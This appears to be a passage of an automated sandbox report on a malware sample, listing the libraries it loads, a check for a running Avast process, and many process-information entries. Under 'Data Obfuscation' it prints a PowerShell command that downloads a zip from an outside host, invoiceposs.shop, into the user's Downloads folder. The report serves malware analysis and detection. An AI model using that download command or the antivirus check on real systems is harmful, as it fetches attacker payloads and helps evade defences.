Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\tasklist.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe"
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: <li><a href="library/pdb.html#pdb.Pdb.set_trace">(pdb.Pdb method)</a> source: genindex-S.html.17.dr
Source: Binary string: .pdbrc source: genindex-Symbols.html.17.dr
Source: Binary string: <li><p>The <a class="reference internal" href="../library/pdb.html#module-pdb" title="pdb: The Python debugger for interactive interpreters."><code class="xref py py-mod docutils literal notranslate"><span class="pre">pdb</span></code></a> module now reads the <code class="file docutils literal notranslate"><span class="pre">.pdbrc</span></code> configuration file with source: 3.11.html.17.dr

Data Obfuscation

barindex
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoiceposs.shop:9005/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"

Persistence and Installation Behavior

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSystem file written: C:\Users\user\Downloads\Extracted\Python\Python312\Doc\html\c-api\tuple.htmlJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
